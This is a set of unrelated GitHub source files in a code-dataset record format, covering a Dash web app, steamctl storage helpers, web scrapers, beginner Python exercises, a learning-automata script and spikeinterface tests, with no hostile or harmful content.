dash_app.search import search_layout\nfrom flask_login import login_required\n\n\n\n\nstyle_2 = {\n}\nnav = dbc.Nav([\n dbc.NavItem(dbc.NavLink(\"Home\", id='home', href='/home', style=style_2), class_name='me-1'),\n dbc.NavItem(dbc.NavLink(\"Register\", id='register', href='/register', style=style_2), class_name='me-1'),\n dbc.NavItem(dbc.NavLink(\"Records\", id='records', href='/records', style=style_2), class_name='me-1'),\n dbc.NavItem(dbc.NavLink(\"Search\", id='search', href='/search', style=style_2), class_name='me-1'),\n dbc.NavItem(dbc.NavLink(\"Logout\", id='logout', href='/logout', style=style_2, external_link=True), class_name='me-1')\n],navbar=True, justified=True, class_name='mx-auto fs-4')\n\nnavbar = dbc.Navbar(\n dbc.Container([\n dbc.Col([\n html.A([\n dbc.Row([\n dbc.Col([\n html.Img(src='assets/tbcn-logo2.png', width=200, height=100,className='navbar-brand rounded float-start'),\n html.Small('To Be Connected Nigeria', className='light')\n ], class_name='col-3 align-center'),\n ], align='center', className='g-0'),\n ], href='/'),\n ], align='start', class_name='col-3'),\n dbc.Col([\n html.H2('Save-80 Geo-locator'), #style={'color':'#B8E1E9'}\n dbc.NavbarToggler(id='nav-toggler', n_clicks=0),\n dbc.Collapse(nav, id='navbar-collapse', is_open=False, navbar=True)\n ],class_name='col-6 text-center header-text'),\n dbc.Col(html.Img(src='assets/atmosfair.png', width=200, 
height=100,className='navbar-brand rounded float-end'))\n ], fluid=True, class_name='d-flex justify-content-center')\n,id='navbar', class_name='navbar')\n\n\nFOOTER_STYLE = {\n \"position\": \"fixed\",\n \"bottom\": 0,\n \"left\": 0,\n \"right\": 0,\n 'height':'80px',\n # 'background': '#bdc3c7',\n # 'background': '-webkit-linear-gradient(to top, #2c3e50, #bdc3c7)',\n # 'background': 'linear-gradient(to top, #2c3e50, #bdc3c7)',\n\n\n}\ncontent_con = {\n # 'backround-color': '#606c88',\n # 'background': '-webkit-linear-gradient(0deg, #606c88 0%, #3f4c6b 100%)',\n # 'background': 'linear-gradient(0deg, #606c88 0%, #3f4c6b 100%)',\n 'background-image': 'url(assets/background.jpg)'\n}\n\nmain_layout = dbc.Container([\n dcc.Store(id='cached_data'),\n dcc.Location(id='location'),\n dcc.Interval(id='query_data', interval=15*1000),\n dbc.Row(navbar, class_name='sticky-top'),\n dbc.Row(\n dbc.Col(id='content_container', lg={'size':12}, class_name='content-con') #content_con\n ),\n dbc.Row([\n dbc.Col([\n html.Small('13a, Mambila Street, Aso Drive, Abuja.', className='m-info'), #, style={'color':'#B8E1E9'}\n html.A('www.tbcn.com.ng', href='http://tbcn.com.ng') #style={'color':'#B8E1E9'}\n ], class_name='me-auto info_footer'),\n dbc.Col([\n html.H3('Powered by Metaverse®', className='footer_text mt-2')\n ], class_name='text-center footer mt-0'),\n dbc.Col([\n html.Small('To Be Connected Nigeria®', className='m-info ms-auto'), #, style={'color':'#B8E1E9'}\n html.Small('2022©', className='ms-auto') #, style={'color':'#B8E1E9'}\n ], class_name='text-center info_footer')\n ], class_name='d-flex justify-content-center bg-light', style=FOOTER_STYLE) \n], fluid=True, class_name='main_content')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef create_dash_app(server):\n dash_app = DashProxy(__name__, external_stylesheets=[dbc.themes.BOOTSTRAP], transforms=[ServersideOutputTransform()], server=server, url_base_pathname='/')\n dash_app.title = \"Save-80\"\n # server = dash_app.server\n dash_app.validation_layout = html.Div([main_layout, home_layout, form_layout, customer_records, search_layout])\n dash_app.layout = main_layout\n\n register_callbacks(dash_app)\n _protect_dashviews(dash_app)\n return dash_app\n\n\ndef _protect_dashviews(dashapp):\n for view_func in dashapp.server.view_functions:\n if view_func.startswith(dashapp.config.url_base_pathname):\n dashapp.server.view_functions[view_func] = login_required(\n dashapp.server.view_functions[view_func])\n","repo_name":"saifvoice/Asset-Tracker-Project","sub_path":"dash_app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15128838389","text":"\nimport os\nimport re\nimport json\nimport logging\nfrom time import time\nfrom io import open\nfrom contextlib import contextmanager\nimport fnmatch\nimport shutil\nfrom collections import UserDict\nimport sqlite3\nfrom appdirs import AppDirs\nfrom steamctl import __appname__\n\n_LOG = logging.getLogger(__name__)\n_appdirs = AppDirs(__appname__)\n\ndef ensure_dir(path, mode=0o750):\n dirpath = os.path.dirname(path)\n\n if not os.path.exists(dirpath):\n _LOG.debug(\"Making dirs: %s\", dirpath)\n os.makedirs(dirpath, mode)\n\ndef normpath(path):\n if os.sep == '/':\n path = path.replace('\\\\', '/')\n return os.path.normpath(path)\n\ndef sanitizerelpath(path):\n return re.sub(r'^((\\.\\.)?[\\\\/])*', '', normpath(path))\n\n\nclass FileBase(object):\n _root_path = None\n\n def __init__(self, 
relpath, mode='r'):\n        self.mode = mode\n        self.relpath = relpath\n        self.path = normpath(os.path.join(self._root_path, relpath))\n        self.filename = os.path.basename(self.path)\n\n    def __repr__(self):\n        return \"%s(%r, mode=%r)\" % (\n            self.__class__.__name__,\n            self.relpath,\n            self.mode,\n            )\n\n    def exists(self):\n        return os.path.exists(self.path)\n\n    def mkdir(self):\n        ensure_dir(self.path, 0o700)\n\n    def older_than(self, seconds=0, minutes=0, hours=0, days=0):\n        # True when the file was last modified more than the given interval ago\n        delta = seconds + (minutes*60) + (hours*3600) + (days*86400)\n        ts = os.path.getmtime(self.path)\n        return ts + delta < time()\n\n    def open(self, mode):\n        _LOG.debug(\"Opening file (%s): %s\", mode, self.path)\n        self.mkdir()\n        return open(self.path, mode)\n\n    def read_text(self):\n        if self.exists():\n            with self.open('r') as fp:\n                return fp.read()\n\n    def write_text(self, data):\n        with self.open('w') as fp:\n            fp.write(data)\n\n    def read_json(self):\n        if self.exists():\n            with self.open('r') as fp:\n                return json.load(fp)\n\n    def write_json(self, data, pretty=True):\n        with self.open('w') as fp:\n            if pretty:\n                json.dump(data, fp, indent=4, sort_keys=True)\n            else:\n                json.dump(data, fp)\n\n    def remove(self):\n        _LOG.debug(\"Removing file: %s\", self.path)\n\n        if self.exists():\n            os.remove(self.path)\n\n    def secure_remove(self):\n        _LOG.debug(\"Securely removing file: %s\", self.path)\n\n        if self.exists():\n            with open(self.path, 'r+b') as fp:\n                size = fp.seek(0, 2)\n\n                fp.seek(0)\n                chunk = b'0' * 4096\n\n                while fp.tell() + 4096 < size:\n                    fp.write(chunk)\n                fp.write(chunk[:max(size - fp.tell(), 0)])\n\n                fp.flush()\n                os.fsync(fp.fileno())\n\n            os.remove(self.path)\n\n    def __enter__(self):\n        self._fp = self.open(self.mode)\n        return self._fp\n\n    def __exit__(self, exc_type, exc_value, traceback):\n        self._fp.close()\n\nclass UserDataFile(FileBase):\n    _root_path = _appdirs.user_data_dir\n\nclass UserCacheFile(FileBase):\n    _root_path = _appdirs.user_cache_dir\n\nclass DirectoryBase(object):\n    _root_path = None\n    _file_type = None\n\n    def __init__(self, path='.'):\n        self.path = normpath(os.path.join(self._root_path, path))\n\n        if self.exists() and not os.path.isdir(self.path):\n            raise ValueError(\"Path is not a directory: %s\" % self.path)\n\n    def mkdir(self):\n        ensure_dir(self.path + os.sep, 0o700)\n\n    def exists(self):\n        return os.path.exists(self.path)\n\n    def remove(self):\n        _LOG.debug(\"Removing directory: %s\", self.path)\n        shutil.rmtree(self.path)\n\n    def iter_files(self, pattern=None, recurse=False):\n        if not os.path.exists(self.path):\n            return\n\n        for root, dirs, files in os.walk(self.path):\n            if not recurse and self.path != root:\n                break\n\n            if pattern:\n                files = fnmatch.filter(files, pattern)\n\n            yield from (self._file_type(os.path.join(root, filename)) for filename in files)\n\nclass UserDataDirectory(DirectoryBase):\n    _root_path = _appdirs.user_data_dir\n    _file_type = UserDataFile\n\nclass UserCacheDirectory(DirectoryBase):\n    _root_path = _appdirs.user_cache_dir\n    _file_type = UserCacheFile\n\n\nclass SqliteDict(UserDict):\n    def __init__(self, path=':memory:'):\n        if isinstance(path, FileBase):\n            path.mkdir()\n            path = path.path\n\n        self.path = path\n        self._db = sqlite3.connect(path)\n        self._db.execute('CREATE TABLE IF NOT EXISTS kv (key INTEGER PRIMARY KEY, value TEXT)')\n        self._db.commit()\n\n    def __repr__(self):\n        return \"%s(path=%r)\" % (\n            self.__class__.__name__,\n            self.path,\n        )\n\n    def __len__(self):\n        return self._db.execute('SELECT count(*) FROM kv').fetchone()[0]\n\n    def __contains__(self, key):\n        return self.get(key) is not None\n\n    def 
get(self, key, default=None):\n        row = self._db.execute('SELECT value FROM kv WHERE key = ?', (key,)).fetchone()\n        return row[0] if row else default\n\n    def __getitem__(self, key):\n        val = self.get(key)\n\n        if val is None:\n            raise KeyError(key)\n        else:\n            if val and val[0] == '{' and val[-1] == '}':\n                val = json.loads(val)\n            return val\n\n    def __setitem__(self, key, val):\n        if isinstance(val, str):\n            pass\n        elif isinstance(val, dict):\n            val = json.dumps(val)\n        else:\n            raise TypeError(\"Only str or dict types are allowed\")\n\n        self._db.execute(\"REPLACE INTO kv VALUES (?, ?)\", (key, val))\n\n    def items(self):\n        for item in self._db.execute(\"SELECT key, value FROM kv ORDER BY key ASC\"):\n            yield item\n\n    def commit(self):\n        self._db.commit()\n\n    def __del__(self):\n        self.commit()\n\n        try:\n            self._db.close()\n        except Exception:\n            pass\n","repo_name":"ValvePython/steamctl","sub_path":"steamctl/utils/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":6066,"program_lang":"python","lang":"en","doc_type":"code","stars":262,"dataset":"github-code","pt":"53"} +{"seq_id":"74441450408","text":"from django import forms\nfrom pagedown.widgets import PagedownWidget\nfrom .models import Post\nfrom django.utils import timezone\n\nclass PostForm(forms.ModelForm):\n\ttitle = forms.CharField()\n\tcontent = forms.CharField(\n\t\twidget = PagedownWidget(show_preview = False),\n\t\trequired = True,\n\t)\n\tclass Meta:\n\t\tmodel = Post\n\t\tfields = [\n\t\t\t\"title\",\n\t\t\t\"content\",\n\t\t\t\"image\",\n\t\t\t\"draft\",\n\t\t\t\"publish\",\n\t\t]","repo_name":"jai-singhal/My-Blog","sub_path":"src/posts/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}

# find the <a> tag\n            a_tag = td.find('a', class_='bubblelink code')\n            if a_tag:\n                # extract the text content of the tag and append it to the list\n                course_code = a_tag.text.strip()\n                course_code = course_code.replace(\"\\xa0\", \" \")\n\n                if \"/\" in course_code:\n                    # split the string into two parts\n                    parts = course_code.split(\" \")\n\n                    # split the first part into multiple parts based on \"/\"\n                    nums = parts[0].split(\"/\")\n                    major_codes = []\n                    for num in nums:\n                        # get the major code and modify the course code\n                        subject = num.replace(num, \"\").strip(\"/\")\n                        course_code = num.replace(\"/\", \" \") + \" \" + parts[1]\n                        \n                        course_code = subject + \" \" + course_code\n                        course_code = course_code.lstrip()\n\n                        # append the major code and course code to the list\n                        print(course_code)\n                        major_requirements.append([degree_acronym, major, course_code])\n                    # print the resulting major codes and course codes\n\n                else:\n                    # print the input string without modification\n                    print(course_code)\n                    major_requirements.append([degree_acronym, major, course_code])\n\n            print()\n\n# Connect to the SQLite database\n\nmajor_requirements = [list(t) for t in set(tuple(lst) for lst in major_requirements)]\nconn = sqlite3.connect('class_information.db')\n\nheaders = ['Degree','Major','Course']\nmajor_requirements_df = pd.DataFrame(major_requirements, columns=headers)\n\n\n# Write the dataframe to an SQLite table\nmajor_requirements_df.to_sql('major_requirements', conn, if_exists='replace', index=True)\n\n# Close the database connection\nconn.close()","repo_name":"SamoanJohn/Schedule-Conflict-Checker","sub_path":"Major_Requirements_Scraping.py","file_name":"Major_Requirements_Scraping.py","file_ext":"py","file_size_in_byte":4654,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37158278662","text":"\"\"\"\nclass declares the name of a class\nThe first letter of a class name must be capitalized\nIn object-oriented programming, the \"objects\" referred to are the classes\nEvery method in a class must take a parameter called self\nEncapsulation, inheritance, overriding/polymorphism\n\"\"\"\n\nclass Girlfreind(object): # object: the ancestor base class; it is the default when there is nothing else to inherit, and __init__ is a method inherited from object\n    \"\"\"\n    Girlfriend\n    \"\"\"\n    def __init__(self,sex,high,age,weight,hair):\n        \"\"\"\n        Basic information\n        \"\"\"\n        self.sex=sex\n        self.high=high\n        self.age=age\n        self.weight=weight\n        self.hair=hair\n    def skill(self,num):\n        \"\"\"\n        Personal skills\n        \"\"\"\n        print(\"你性别为\"+self.sex+\"身高\"+self.high+\"年龄\"+self.age+\",\"+\"体重\"+self.weight+\",\"+\"留着\"+self.hair+\"的女朋友开始了\")\n        if num==1:\n            print(\"胸口碎大石\")\n        elif num==2:\n            print(\"拳击\")\n        else:\n            print(\"吉他\")\n\n    def cooking(self):\n        \"\"\"\n        Cooking skills\n        \"\"\"\n        print(\"你性别为\"+self.sex+\"身高\"+self.high+\"年龄\"+self.age+\",\"+\"体重\"+self.weight+\",\"+\"留着\"+self.hair+\"的女朋友开始了\")\n        print(\"八大菜系,样样精通\")\n\n    def work(self):\n        \"\"\"\n        Job\n        \"\"\"\n        print(\"软件测试工程师\")\n\n# Instantiating the class / creating an instance\n# Essilia=Girlfreind(\"女\",\"160cm\",\"18岁\",\"45kg\",\"黑色短发\")\n# Essilia.work()\n# print(Essilia.sex)\n# Essilia.skill(1)\n\nclass girlfriend(Girlfreind): # inheritance\n    pass # pass is a placeholder\nzhangsan=girlfriend(\"女\",\"180cm\",\"18岁\",\"60kg\",\"黑色短发\")\nzhangsan.cooking()\n\nclass boyfriend(Girlfreind): # overriding\n    def cooking(self):\n        print(\"全能泡面王\") \nzhangsan=boyfriend(\"男\",\"180cm\",\"18岁\",\"60kg\",\"黑色短发\")\nzhangsan.cooking()\n\n\n","repo_name":"Essilia/Python-Practice","sub_path":"demo4.py","file_name":"demo4.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19739692025","text":"# Calculate Gross Pay\r\n# Sigrid Olive\r\n# 6/6\r\n\r\nprint ('This program calculates gross pay.')\r\n\r\n#input the hourly wage\r\nwage = 
int(input('Hourly wage? '))\r\n\r\n#input hours worked\r\nhours = input ('Hours worked?')\r\nhours = int(hours)\r\n\r\n#calculate gross pay\r\ngrossPay = wage * hours\r\n\r\n#output gross pay\r\nprint ('Your gross pay is:', grossPay)\r\n\r\n# input the hourly wage\r\nwage = float(input ('Hourly wage? '))\r\n\r\n#input hours worked\r\n# (this works the same as the nested version)\r\nhours = input ('Hours worked? ')\r\nhours = int (hours)\r\n\r\n#calculate gross pay\r\ngrossPay = wage * hours\r\n\r\n#output gross pay\r\nprint ('Your gross pay is: ', grossPay)\r\n\r\n","repo_name":"olives8109/CTI-110-1001","sub_path":"m2_grosspayfloat.py","file_name":"m2_grosspayfloat.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4907443597","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 12 23:56:34 2019\n\n@author: wangjingyi\n\"\"\"\n\nimport numpy as np\nimport time\nfrom random import choice\nimport pandas as pd\nimport os\n\n# Define the method that computes the Common Neighbors index\n#define some functions to calculate some baseline index\ndef Cn(MatrixAdjacency):\n    Matrix_similarity = np.dot(MatrixAdjacency,MatrixAdjacency)\n    return Matrix_similarity\n\n# Compute the Jaccard similarity index\ndef Jaccavrd(MatrixAdjacency_Train):\n    Matrix_similarity = np.dot(MatrixAdjacency_Train,MatrixAdjacency_Train)\n    deg_row = sum(MatrixAdjacency_Train)\n    deg_row.shape = (deg_row.shape[0],1)\n    deg_row_T = deg_row.T\n    tempdeg = deg_row + deg_row_T\n    temp = tempdeg - Matrix_similarity\n    Matrix_similarity = Matrix_similarity / temp\n    return Matrix_similarity\n\n# Define the method that computes the Salton index\ndef Salton_Cal(MatrixAdjacency_Train):\n    similarity = np.dot(MatrixAdjacency_Train,MatrixAdjacency_Train)\n    deg_row = sum(MatrixAdjacency_Train)\n    deg_row.shape = (deg_row.shape[0],1)\n    deg_row_T = deg_row.T\n    tempdeg = np.dot(deg_row,deg_row_T)\n    temp = np.sqrt(tempdeg)\n    np.seterr(divide='ignore', invalid='ignore')\n    Matrix_similarity = np.nan_to_num(similarity / temp)\n    print(np.isnan(Matrix_similarity))\n    Matrix_similarity = np.nan_to_num(Matrix_similarity)\n    print(np.isnan(Matrix_similarity))\n    return Matrix_similarity\n\n# Define the method that computes the Katz index\ndef Katz_Cal(MatrixAdjacency):\n    # value of α\n    Parameter = 0.01\n    Matrix_EYE = np.eye(MatrixAdjacency.shape[0])\n    Temp = Matrix_EYE - MatrixAdjacency * Parameter\n    Matrix_similarity = np.linalg.inv(Temp)\n    Matrix_similarity = Matrix_similarity - Matrix_EYE\n    return Matrix_similarity\n\n# Define the method that computes the Local Path (LP) similarity index\ndef LP_Cal(MatrixAdjacency):\n    Matrix_similarity = np.dot(MatrixAdjacency,MatrixAdjacency)\n    Parameter = 0.05\n    Matrix_LP = np.dot(np.dot(MatrixAdjacency,MatrixAdjacency),MatrixAdjacency) * Parameter\n    # LP index: A^2 + alpha * A^3\n    Matrix_similarity = Matrix_similarity + Matrix_LP\n    return Matrix_similarity\n\n# Compute the Resource Allocation (RA) similarity index\ndef RA(MatrixAdjacency_Train):\n    RA_Train = sum(MatrixAdjacency_Train)\n    RA_Train.shape = (RA_Train.shape[0],1)\n    MatrixAdjacency_Train_Log = MatrixAdjacency_Train / RA_Train\n    MatrixAdjacency_Train_Log = np.nan_to_num(MatrixAdjacency_Train_Log)\n    Matrix_similarity = np.dot(MatrixAdjacency_Train,MatrixAdjacency_Train_Log)\n    return Matrix_similarity\n\n# Simulated random environment 1: for active node pairs\ndef RandomEnviromentForActive(MatrixAdjacency,i,j):\n    Index = np.random.randint(1, 5)\n    print(Index)\n    global IndexName\n    if Index == 1:\n        IndexName = '相似性指标是:Jaccard Index'\n        print(IndexName)\n        similarity_matrix = Jaccavrd(MatrixAdjacency)\n        similarity = similarity_matrix[i,j]\n    elif Index == 2:\n        IndexName = '相似性指标是:Salton Index'\n        print(IndexName)\n        similarity_matrix 
= Salton_Cal(MatrixAdjacency)\n        similarity = similarity_matrix[i,j]\n    elif Index == 3:\n        IndexName = '相似性指标是:Katz Index'\n        print(IndexName)\n        similarity_matrix = Katz_Cal(MatrixAdjacency)\n        similarity = similarity_matrix[i,j]\n    else:\n        IndexName = '相似性指标是:RA Index'\n        print(IndexName)\n        similarity_matrix = RA(MatrixAdjacency)\n        similarity = similarity_matrix[i,j]\n    return similarity\n\n# Random environment 2: mainly for non-active node pairs\ndef RandomEnviromentForNonActive():\n\n    Action = np.random.randint(1, 4)\n    if Action == 1:\n        ActionName = 'ID3'\n        similarity_matrix = ID3_Cal(MatrixAdjacency)\n        #similarity = similarity_matrix[i,j]\n    elif Action == 2:\n        ActionName = 'CART'\n        similarity_matrix = Cart_Cal(MatrixAdjacency)\n        #similarity = similarity_matrix[i,j]\n    elif Action == 3:\n        ActionName = 'C4.5'\n        similarity_matrix = C4_Cal(MatrixAdjacency)\n        #similarity = similarity_matrix[i,j]\n    return similarity\n\n# Build the learning automaton agent (To Construct the agent)\ndef ContructionAgent(filepath,n1,n2):\n    f = open(filepath)\n    lines = f.readlines()\n    A = np.zeros((50, 50), dtype=float)\n    A_row = 0\n    for line in lines:\n        list = line.strip('\\n').split(' ')\n        A[A_row:] = list[0:50]\n        A_row += 1\n    \n    # Initialize p1 and p2\n    a = 0.05\n    b = 0.01\n    p1 =0.5\n    p2 =0.5\n    Action = 1\n    # Here the number 1 stands for choosing action 'Yes' and 2 for action 'No'\n    for i in range(1):\n        \n        # global Action\n        # similarity threshold (the threshhold_value of similarity)\n        if (p1 >= p2):\n            Action = 1\n        else:\n            Action = 2\n        print('选择的动作是:' + str(Action))\n        threshhold_value = 0.3\n        similarity = RandomEnviromentForActive(A, n1, n2)\n        # p1 is the probability of choosing action 1 'Yes'; p2 is the probability of choosing action 2 'No'\n        # The previous action was 'Yes' and it was rewarded\n        if (similarity > threshhold_value) and (Action == 1):\n            p1 = p1 + a * (1 - p1)\n            p2 = 1-p1\n            # p2 = (1 - a) * p2\n        # The previous action was 'No' and it was rewarded\n        elif (similarity < threshhold_value) and (Action == 2):\n            p2 = (1-a)*p2\n            p1 = 1-p2\n            # p1 = (1 - a) * p1\n        # The previous action was 'Yes' but it was penalized\n        elif (similarity < threshhold_value) and (Action == 1):\n            p2 = 1-b*p2\n            p1 = 1-p2\n            #p2 = 1 - b * p2\n        \n        # The previous action was 'No' but it was penalized\n        elif (similarity > threshhold_value) and (Action == 2):\n            p1 = b + (1 - b) * (1 - p1)\n            p2 = 1-p1\n            # p1 = 1 - b * p1\n        \n    if (p1 >= p2):\n        print('下一时刻选择的动作是:Yes')\n    else:\n        print('下一时刻选择的动作是:No')\n    return p1, p2\n\n\n# Main test program\npath=r'../Data/itcmatrixs/36000/'\nresult = np.zeros((50, 50))\nfor i in os.walk(path):\n    for m in range(50):\n        for n in range(50):\n            r = None\n            for j in range(26):\n                datapath = path+i[2][j]\n                p1,p2 = ContructionAgent(datapath,m,n)\n                r = int(p1>=p2)\n            result[m,n] = r\n# save the learned decision matrix\nnp.save('result.npy', result)\n","repo_name":"SintolRTOS/Learning_Automata","sub_path":"learning_automata.py","file_name":"learning_automata.py","file_ext":"py","file_size_in_byte":6529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12785105907","text":"import scrapy\nimport json\n\n\nclass DevtosSpider(scrapy.Spider):\n\n    url_list = ['https://dev.to/search/feed_content?per_page=100&page=' +\n                str(i) for i in range(10)]\n    name = \"devto\"\n    start_urls = url_list\n\n    def parse(self, response):\n        data = json.loads(response.text)\n\n        dev_list = [i for i in data['result']]\n\n        for i in range(len(dev_list)):\n            yield {\n                'title': dev_list[i]['title'],\n                'author': dev_list[i]['user']['name'],\n                'tag_list': dev_list[i]['tag_list'],\n                'date': dev_list[i]['readable_publish_date'],\n                'reading_time': dev_list[i]['reading_time']\n            
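                # one item is yielded per post in the dev.to search feed\n            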
}\n","repo_name":"dklarin/scrap-dev.to","sub_path":"dev_scraps.py","file_name":"dev_scraps.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70292392169","text":"import socket\n\nHOST = \"localhost\"\nPORT = 50000\nBUFF_SIZE = 4096\n\n# create socket\nclient = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\ntry:\n    # request information from the server\n    client.sendto(b\"Hi!\", (HOST, PORT))\n\n    # receive message from server\n    data = client.recv(BUFF_SIZE)\n    print(data.decode(\"UTF-8\"))\n\nfinally:\n    # close connection\n    client.close()\n","repo_name":"akitanak/tcpip_socket_programming_by_python","sub_path":"src/chapter02/client0udp.py","file_name":"client0udp.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26976660896","text":"from yahoo_fin import stock_info as si\nfrom datetime import datetime, timedelta, date\nimport pandas as pd\n\ndef tabla_div():\n    df = pd.read_csv('tickers.csv', header=None, encoding='utf-8')\n    tickers = df[0].to_list()\n    df = pd.DataFrame()\n    cont = 0\n    for ticker in tickers:\n        try:\n            one_day = timedelta(days=600)\n            first_day_of_the_month = date.today().replace(day=1)\n            fecha_de_inicio = first_day_of_the_month - one_day\n            aux_div = si.get_dividends(ticker, start_date=fecha_de_inicio)\n\n            df2 = pd.DataFrame(index=aux_div.index.astype(str).to_list(), data=aux_div['dividend'].tolist(),\n                               columns=[ticker])\n            df = pd.concat([df2,df],axis=0)\n            df = df.sort_index(ascending=False)\n            cont = cont + 1\n\n        except Exception as error:\n            print(str(error))\n            print(ticker)\n            continue\n    df.to_csv('resultados_dividendos.csv', index = True)\n\nif __name__ == '__main__':\n    tabla_div()","repo_name":"al118345/Analisis_Financiero","sub_path":"obtener_historico_dividendos/historico_dividendos.py","file_name":"historico_dividendos.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36194809432","text":"'''\ntakes two numbers and prints every number on the segment that is divisible by each of its digits\n'''\nk = 0\na = int(input())\nb = int(input())\nfor i in range(a, b + 1):\n    k = 0\n    digits = str(i)\n    for ch in digits:  # check each digit of the number\n        d = int(ch)\n        if d != 0 and i % d == 0:\n            k += 1\n    if k == len(digits):\n        print(i)\n","repo_name":"Spaklak/InformaticsSolve","sub_path":"казанин1.py","file_name":"казанин1.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7178255519","text":"import math\nclass Solution:\n    def maxProfit(self, prices: List[int]) -> int:\n        pos = math.inf\n        \n        maxSellPrice = 0\n        \n        for i in prices:\n            if i < pos:\n                pos = i\n            if i-pos > maxSellPrice:\n                maxSellPrice = i-pos\n        \n        return maxSellPrice","repo_name":"mmkvdev/leetcode","sub_path":"September/Week3/Day4/Submissions/py/besttimetoSellStock.py","file_name":"besttimetoSellStock.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"17888017187","text":"import pytest\nimport shutil\nfrom pathlib import Path\nfrom spikeinterface.core import WaveformExtractor, extract_waveforms, load_extractor\nfrom spikeinterface.core.testing import check_recordings_equal\nfrom spikeinterface.comparison import 
(\n create_hybrid_units_recording,\n create_hybrid_spikes_recording,\n generate_injected_sorting,\n)\nfrom spikeinterface.extractors import toy_example\nfrom spikeinterface.preprocessing import bandpass_filter\n\n\nif hasattr(pytest, \"global_test_folder\"):\n cache_folder = pytest.global_test_folder / \"comparison\" / \"hybrid\"\nelse:\n cache_folder = Path(\"cache_folder\") / \"comparison\" / \"hybrid\"\n\n\ndef setup_module():\n if cache_folder.is_dir():\n shutil.rmtree(cache_folder)\n cache_folder.mkdir(parents=True, exist_ok=True)\n recording, sorting = toy_example(\n duration=60, num_channels=4, num_units=5, num_segments=2, average_peak_amplitude=-1000\n )\n recording = bandpass_filter(recording, freq_min=300, freq_max=6000)\n recording = recording.save(folder=cache_folder / \"recording\")\n sorting = sorting.save(folder=cache_folder / \"sorting\")\n\n wvf_extractor = extract_waveforms(\n recording, sorting, folder=cache_folder / \"wvf_extractor\", ms_before=10.0, ms_after=10.0\n )\n\n\ndef test_hybrid_units_recording():\n wvf_extractor = WaveformExtractor.load(cache_folder / \"wvf_extractor\")\n recording = wvf_extractor.recording\n templates = wvf_extractor.get_all_templates()\n templates[:, 0, :] = 0\n templates[:, -1, :] = 0\n hybrid_units_recording = create_hybrid_units_recording(\n recording, templates, nbefore=wvf_extractor.nbefore, injected_sorting_folder=cache_folder / \"injected0\"\n )\n\n assert hybrid_units_recording.get_traces(end_frame=600, segment_index=0).shape == (600, 4)\n assert hybrid_units_recording.get_traces(start_frame=100, end_frame=600, segment_index=1).shape == (500, 4)\n assert hybrid_units_recording.get_traces(start_frame=recording.get_num_frames(0) - 200, segment_index=0).shape == (\n 200,\n 4,\n )\n\n # Check dumpability\n saved_loaded = load_extractor(hybrid_units_recording.to_dict())\n check_recordings_equal(hybrid_units_recording, saved_loaded, return_scaled=False)\n\n saved_1job = hybrid_units_recording.save(folder=cache_folder / \"units_1job\")\n saved_2job = hybrid_units_recording.save(folder=cache_folder / \"units_2job\", n_jobs=2, chunk_duration=\"1s\")\n check_recordings_equal(hybrid_units_recording, saved_1job, return_scaled=False)\n check_recordings_equal(hybrid_units_recording, saved_2job, return_scaled=False)\n\n\ndef test_hybrid_spikes_recording():\n wvf_extractor = WaveformExtractor.load_from_folder(cache_folder / \"wvf_extractor\")\n recording = wvf_extractor.recording\n sorting = wvf_extractor.sorting\n hybrid_spikes_recording = create_hybrid_spikes_recording(\n wvf_extractor, injected_sorting_folder=cache_folder / \"injected1\"\n )\n hybrid_spikes_recording = create_hybrid_spikes_recording(\n wvf_extractor, unit_ids=sorting.unit_ids[:3], injected_sorting_folder=cache_folder / \"injected2\"\n )\n\n assert hybrid_spikes_recording.get_traces(end_frame=600, segment_index=0).shape == (600, 4)\n assert hybrid_spikes_recording.get_traces(start_frame=100, end_frame=600, segment_index=1).shape == (500, 4)\n assert hybrid_spikes_recording.get_traces(start_frame=recording.get_num_frames(0) - 200, segment_index=0).shape == (\n 200,\n 4,\n )\n\n # Check dumpability\n saved_loaded = load_extractor(hybrid_spikes_recording.to_dict())\n check_recordings_equal(hybrid_spikes_recording, saved_loaded, return_scaled=False)\n\n saved_1job = hybrid_spikes_recording.save(folder=cache_folder / \"spikes_1job\")\n saved_2job = hybrid_spikes_recording.save(folder=cache_folder / \"spikes_2job\", n_jobs=2, chunk_duration=\"1s\")\n 
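    # the serial and parallel saves should both reproduce the hybrid recording's traces exactly\n    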
